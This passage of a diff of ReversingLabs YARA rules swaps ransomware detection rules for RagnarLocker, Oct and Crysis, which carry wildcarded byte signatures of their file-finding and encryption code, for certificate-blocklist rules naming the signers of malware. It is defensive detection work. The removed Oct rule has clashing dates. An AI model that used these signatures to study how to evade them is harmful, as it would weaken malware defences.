-            85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0
-        }
-		$enum_shares_p3 = {
-            8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ??
-            3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ??
-            0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89
-            45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ??
-            75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ??
-            8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BLADES" and pe.signatures [ i ] . serial == "29:be:22:78:11:3d:d0:62:ea:dc:a3:2d:e6:b2:42:d0" and 1536883200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_05F70A557Afd4A443F44D0Baf0Bc8C60 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RagnarLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "9ce5b6c7-fede-508f-a7d0-f9d0b8838645"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15918-L15934"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3945f515b65ca3ffb6c2b64c884bb2790d703a277e1a5ba128c81bc63ed20a25"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RagnarLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57
-            8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3
-        }
-		$find_files_p2 = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
-            ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            56 FF D3
-        }
-		$find_files_p3 = {
-            33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ??
-            53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9
-            ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B
-            E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-        }
-		$encrypt_files_p2 = {
-            8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ??
-            ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ??
-            50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ??
-            ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ??
-            ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ??
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ??
-            ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ??
-            ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85
-        }
-		$encrypt_files_p3 = {
-            0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ??
-            0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "05:f7:0a:55:7a:fd:4a:44:3f:44:d0:ba:f0:bc:8c:60" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4E0665D61997072294A70C662F72Eae3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Oct ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e811a0ba-52df-5e88-ab71-df91d5cb584a"
-		date = "2025-10-08"
-		date = "2025-10-08"
-		modified = "2021-08-12"
+		id = "1370a3b5-a254-5197-ac85-5b33e8d9fa38"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15936-L15952"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f07cdfd522db0a92fe1dba30f158b2c89bb5424bdcdfda50ae42fcfddeac19ba"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73
-            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ??
-            ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ??
-            ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33
-            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ??
-            13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$find_files = {
-            16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ??
-            0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B
-            ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E
-            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ??
-            11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ??
-            2A
-        }
-		$collect_env_and_start_enc_proc = {
-            19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ??
-            ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B
-            72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ??
-            A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08
-            1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ??
-            72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ??
-            ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ??
-            ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $collect_env_and_start_enc_proc ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "4e:06:65:d6:19:97:07:22:94:a7:0c:66:2f:72:ea:e3" and 1474502400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_74702Dff5D4056B847D009A2265Fb1B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Crysis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "55f1e321-ce70-519a-9a39-4278162edbef"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15954-L15970"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8acc57bbf334a48043dbee6fab7b7a54a44801b2ccd0ccd9d14194689c75c021"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crysis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ??
-            6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9
-            ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ??
-            74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
-            ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ??
-            6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$enumerate_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ??
-            0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ??
-            57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ??
-            68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56
-            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68
-            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24
-            ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E
-            ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52
-            8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ??
-            ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
-        }
-		$enumerate_resources = {
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83
-            ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B
-            45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B
-            4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83
-            C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C
-            01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B
-            54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45
-            ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83
-            E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ??
